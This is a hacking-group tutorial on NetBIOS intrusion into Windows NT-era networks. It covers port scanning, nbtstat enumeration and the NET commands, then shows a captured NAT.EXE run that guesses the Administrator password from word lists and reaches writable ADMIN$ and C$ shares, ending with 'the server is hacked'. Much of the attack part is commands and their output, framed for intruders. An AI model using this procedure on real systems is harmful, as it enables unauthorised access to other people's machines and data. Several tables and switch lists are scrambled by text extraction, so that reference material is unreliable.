Team Hacking Beast Presents

Complete guide on Net Bios

What is NetBios ?
Net Bios stands for Network basic input output system . It was originally developed by IBM and Sytek as an application program interface. (API) for client software to access LAN resources . By default it runs on port 139. NetBios gives us the various information of the computers on a network which includes computer name , username , domain , group and many others .

Remote Network Penetration via NetBios Hack/Hacking

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.

This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done. When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 the Default NetBios port. Its surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine. Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done. Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT. Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in. If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command. The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits. Interpretation the information can reveal more than one might think. Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] Switches -a Lists the remote computer's name table given its host name. -A -c -n -r Lists the remote computer's name table given its IP address. Lists the remote name cache including the IP addresses. Lists local NetBIOS names. Lists names resolved by broadcast and via WINS.

-R -S -s

Purges and reloads the remote cache name table. Lists sessions table with the destination IP addresses. Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings: Input Number of bytes received. Output Number of bytes sent. In/Out Whether the connection is from the computer (outbound) or from another system to the local computer (inbound). Life The remaining time that a name table cache entry will "live" before your computer purges it. Local Name The local NetBIOS name given to the connection. Remote Host The name or IP address of the remote host. Type A name can have one of two types: unique or group. The last byte of the 16 character NetBIOS name often means something because the same name can be present multiple times on the same computer. This shows the last byte of the name converted into hex. State Your NetBIOS connections will be shown in one of the following "states": State Accepting Associated Meaning An incoming connection is in process. The endpoint for a connection has been created and your computer has associated it with an IP address. Connected This is a good state! It means you're connected to the remote resource.

Connecting

Your session is trying to resolve the name-to-IP address mapping of the destination resource. Your computer requested a disconnect, and it is waiting for the remote computer to do so.

Disconnected

Disconnecting Idle

Your connection is ending.

The remote computer has been opened in the current session, but is currently not accepting connections. An inbound session is trying to connect. The remote computer is available. Your session is creating the TCP connection. If your connection failed on the first attempt, it will display this state as it tries to reconnect.

Inbound Listening Outbound Reconnecting

Another way of Hacking through NetBios

This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows: NAT.EXE [-o filename] [-u userlist] [-p passlist] <address> Switches: -o Specify the output file. All results from the scan will be written to the specified file, in addition

to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file. <address> Addresses should be specified in comma deliminated format, with no spaces. Valid address specifications include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. [8.0.1] Comparing NAT.EXE to Microsoft's own executables [8.0.2] First, a look at NBTSTAT First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools. What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book. C:\nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Here is a partial NetBIOS 16th bit listing: Computername <00> UNIQUE workstation service name <00> GROUP domain name Server <20> UNIQUE Server Service name Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood. Username <03> Registered by the messenger service. Domainname <1B> Registers the local computer as the master browser for the domain Domainname <1C> Registers the computer as a domain controller for the domain (PDC or BDC) Domainname <1D> Registers the local client as the local segments master browser for the domain Domainname <1E> Registers as a Group NetBIOS Name <BF> Network Monitor Name <BE> Network Monitor Agent <06> RAS Server <1F> Net DDE <21> RAS Client

[8.0.3] Intro to the NET commands The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first: [8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements. [8.0.5] Net Computer: This adds or deletes computers from a domains database. [8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services. [8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command. [8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks. [8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers. [8.1.0] Net Help: Help with these commands [8.1.1] Net Helpmsg message#: Get help with a particular net error or function message. [8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups. [8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service. [8.1.5] Net Print: Displays print jobs and shared queues. [8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network. [8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions. [8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares. [8.1.9] Net Statistics Server or Workstation: Shows the statistics log. [8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services. [8.2.1] Net Time: This command is used to display or set the time for a computer or domain. [8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources. [8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts. [8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers. [8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available: Net Net Net Net Net Net Config Diag (runs the diagnostic program) Help Init (loads protocol and network adapter drivers.) Logoff Logon

Net Net Net Net Net Net Net Net

Password (changes password) Print Start Stop Time Use Ver (displays the type and version of the network redirector) View

For this section, the command being used is the NET VIEW and NET USE commands. [8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack. C:\net view XXX.XX.XXX.XX Shared resources at XXX.XX.XXX.XX Share name Type Used as Comment -----------------------------------------------------------------------------NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown. C:\net use /? The syntax of this command is: NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]] NET USE [devicename | *] [password | *]] [/HOME] NET USE [/PERSISTENT:{YES | NO}] C:\net use x: \\XXX.XX.XXX.XX\test The command completed successfully.

C:\unzipped\nat10bin>net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network OK \\XXX.XX.XXX.XX\test Microsoft Windows Network The command completed successfully. Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us. C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XXYYY.YY.YYY.YY [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: XXX.XX.XXX.XX [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--[*]--[*]--1.03 [*]--[*]--[*]--Attempting to connect with name: *SMBSERVER CONNECTED with name: *SMBSERVER Attempting to connect with protocol: MICROSOFT NETWORKS Server time is Mon Dec 01 07:44:34 1997 Timezone is UTC-6.0 Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'

[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--[*]--Attempting to access share: \\*SMBSERVER\ADMIN$ WARNING: Able to access share: \\*SMBSERVER\ADMIN$ Checking write access in: \\*SMBSERVER\ADMIN$ WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ Attempting to access share: \\*SMBSERVER\C$ WARNING: Able to access share: \\*SMBSERVER\C$ Checking write access in: \\*SMBSERVER\C$ WARNING: Directory is writeable: \\*SMBSERVER\C$ Attempting to exercise .. bug on: \\*SMBSERVER\C$ Attempting to access share: \\*SMBSERVER\NETLOGON WARNING: Able to access share: \\*SMBSERVER\NETLOGON Checking write access in: \\*SMBSERVER\NETLOGON Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--[*]--[*]--[*]---

Attempting to access share: \\*SMBSERVER\Test WARNING: Able to access share: \\*SMBSERVER\Test Checking write access in: \\*SMBSERVER\Test Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.

A Small Guide on NetBios Hacking By Ashray Anand : Editor- in- Chief [Hacking Beast]